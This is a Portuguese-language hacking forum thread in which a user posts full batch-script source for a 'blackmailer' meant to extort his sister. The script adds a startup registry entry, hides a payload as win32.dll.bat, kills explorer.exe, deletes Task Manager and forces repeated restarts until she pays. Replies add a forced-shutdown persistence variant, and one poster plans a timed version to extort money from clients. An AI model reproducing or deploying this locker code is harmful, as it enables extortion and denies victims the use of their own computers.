[Source] Chantageador de irmãs noob

Started by 1NT3RC3PT0R, 09 de October , 2006, 06:10:49 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

1NT3RC3PT0R

Olá galerá, hoje eu estava meio sem nada para fazer e com um puta raiva da minha irmã que pegou minha grana emprestada e não quer me pagar, então pensei, tu não me paga e tambem não meche mais no teu micro heheh. Por isso criei o que estou chamando de Chantageador, feito em Batch Script.

O que ele faz? Simples, quando ele é executado ele cria um arquivo chamado win32.dll.bat na pasta system32 do windows e adiciona um reg que faz com que toda vez que o micro for iniciado ele rode o arquivo win32.dll.bat, e depois desliga o micro.

O que o arquivo win32.dll.bat faz? ele finaliza o explorer.exe, que é responsavel pelo modo grafico do windows, impedindo quem você va no inicia > executar e parar o arquivo. Ele tambem faz um backuo do arquivo taskmgr.exe que é responsavel pelo ctrl alt del e depois deleta ele, impedindo a finalização do chantageador. Depois ele da um aviso para a minha irmã me pagar e dentro de 2 minutos e poco ele desliga o micro.

Não tem como minha irmã escapar disso, amenos que ela conheça o fonte do programinha ou eu le ensine a executar o removedor.

Bom, mas vocês devem estar pensando ela vai ter que me pagar pra min remover o chantegador do micro dela. Mas como removerei? Quando o micro é ligado, basta ficar segurando a tecla f8 e entrar no modo seguro com prompt de comando, logue com o usuário da maquina, ai abrira o cmd do windows, la basta digitar-mos cd\ ai dar um enter é obvio e depois escrever remover.bat e dar enter. Após isso irá abrir a telinha do removedor, basta dar enter esperar ele agir e reiniciar o micro.

Ta ai o Código Fonte

@Echo Off
@Break Off
If "%os%" == "Windows_NT" Goto INI
Exit
::
:INI
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 1Nt3Rc3Pt0R /t REG_SZ /d C:\windows\System32\win32.dll.bat
Echo @Echo off >> %WINDIR%\System32\win32.dll.bat
Echo Break off >> %WINDIR%\System32\win32.dll.bat
Echo taskkill /f /im explorer.exe >> %WINDIR%\System32\win32.dll.bat
Echo Cls >> %WINDIR%\System32\win32.dll.bat
Echo ren %windir%\System32\taskmgr.exe bkptaskmgr.exe >> %WINDIR%\System32\win32.dll.bat
Echo cd\ >> %WINDIR%\System32\win32.dll.bat
Echo cd %WINDIR%\System32\ >> %WINDIR%\System32\win32.dll.bat
Echo del /s /q taskmgr.exe >> %WINDIR%\System32\win32.dll.bat
Echo msg * Quando vai me pagar sua desgra‡ada???? >> %WINDIR%\System32\win32.dll.bat
Echo shutdown -r -f -t 140 -c "Enquanto nao me pagar, vai fica sem computador UAHuahUAH!" >> %WINDIR%\System32\win32.dll.bat
Echo Exit >> %WINDIR%\System32\win32.dll.bat
Cls
Echo @Echo off >> C:\remover.bat
Echo color 6 >> C:\remover.bat
Echo Title Chantageador Removedor! >> C:\remover.bat
Echo Echo. >> C:\remover.bat
Echo Echo                        BEM VINDO AO REMOVEDOR DO CHANTAGEADOR >> C:\remover.bat
Echo Echo                          SISTEMA CODADO POR 1Nt3Rc3PtOR >> C:\remover.bat
Echo Echo                            INTECEPTOR.FAKE@HOTMAIL.COM >> C:\remover.bat
Echo Echo                            PRECIONE ENTER PARA REMOVER. >> C:\remover.bat
Echo Pause > nul >> C:\remover.bat
Echo taskkill /f /im win32.dll.bat >> C:\remover.bat
Echo Cls >> C:\remover.bat
Echo shutdown -a >> C:\remover.bat
Echo ren C:\WINDOWS\System32\bkptaskmgr.exe taskmgr.exe >> C:\remover.bat
Echo cd\ >> C:\remover.bat >> C:\remover.bat
Echo cd Windows\System32\ >> C:\remover.bat
Echo del /s /q win32.dll.bat >> C:\remover.bat
Echo exit >> C:\remover.bat
Cls
msg * Pode aproveitar pq ate tu nao me paga, tu nao meche mais no micro.
cls
shutdown -r -f -t 10 -c "XAUUUUUUUU!!!!!!!!!!"
Exit

A utilidade deste programinha é apenas fazer com que a pessoa não possa usar o seu computador, até que atenda nosso pedido e que você  mesmos desabilite o sistema, ou você incine a pessoa a fazelo.

Não criei isto para acabar com um computador, apenas para forçar ela a me pagar, e depois que ela pagar, é só utilizar a vacina e o micro volta totalmente ao normal. Você pode usar em algum caso parecido, nunca se sabe, por isso postei aqui no forum.

Se tiver algum bug me avisem pois qualquer erro não será bom para min.

Flws galera espero ter contribuido para vocês.
Flws

By 1Nt3Rc3Pt0R

vuln

...
Um bom código para uma brincadeira estúpida hehehehe
"O amor por princípio, a Ordem por base, o progresso por objetivo."

tiaguito-.-

Sorte que eu nao tenho irmã mais amigos caloteros não me falta.....vlw
Não tenho medo do escuro, nem do que tem nele, medo do escuro é pra fracos, e vc é um?
Meu MSN ta ali, se quiser add, add mais nun fala bosta não =P

Anonymous

Heheheh, quero fazer o meu... Vou programar aqui e vou postar, só que o meu vai ser diferente, pois ele vai ter que ter uma boa seing para enganar o meu pai!!! E a mim ;].
Ela usa o meu PC então... Bom, vou programar e depois posto o source...

Magrinho Loko

Eu sei que a mensagem é relativamente velha, e eu to dando uma de coveiro desenterrando ela. Mas gostaria de dizer que achei este code muito "instrutivo". Porém só tiver um pequeno problema ao remover o "worm", quando o removedor começava a agir o computador travava e reiniciava. Fiz uma restauração de sistema e creio que o worm foi retirado.

Só gostaria de deixar esse aviso aqui.

Muito obrigado.

[]'s
Saudades do antigo Darkers.

1NT3RC3PT0R

Não importa por ter revivido o topico, foi bom que você fez isso.

Acho q o que fez seu computador reiniciar quando estava removendo o chantageador foi isso:
Echo taskkill /f /im win32.dll.bat >> C:\remover.bat
Echo shutdown -a >> C:\remover.bat
Echo ren C:\WINDOWS\System32\bkptaskmgr.exe taskmgr.exe >> C:\remover.bat

tente remover a linha
b]Echo shutdown -a >> C:\remover.bat[/b]

Deve dar certo. Quando me sobrar um tempo, eu vou dar uma testada nisso novamente, e quem sabe da uma encrementada.

cebolaaa

@echo off
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v explorer /t REG_SZ /d %systemroot%\winwap.bat
echo shutdown -r -t 0 -f > %systemroot%\winwap.bat
del %userprofile%\Menu Iniciar\Programas\Inicializar\0.bat
exit

xD

cebolaaa

para remover ne...

@echo off
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v explorer /t REG_SZ /d %systemroot%\winwap.bat"
exit

e ja era,,,hehe xD

tava pensando em fazer algo programado com data para por nos pcs de clientes q so enchem o saco, botam sempre a culpa na gnt, num sabem nem digitar endereço na barra do explorer, e fikcam falando q os pau q da pq pega virus, pq mexe errado eh culpa minha....HHAHAHa, dias contados....hehehe

to pensando assim: fazer um batch igualzinho a esse, so q ele tem dia e hora pra agir, ai ja garanto uma graninha de tempo em tempo dos malas da vida xD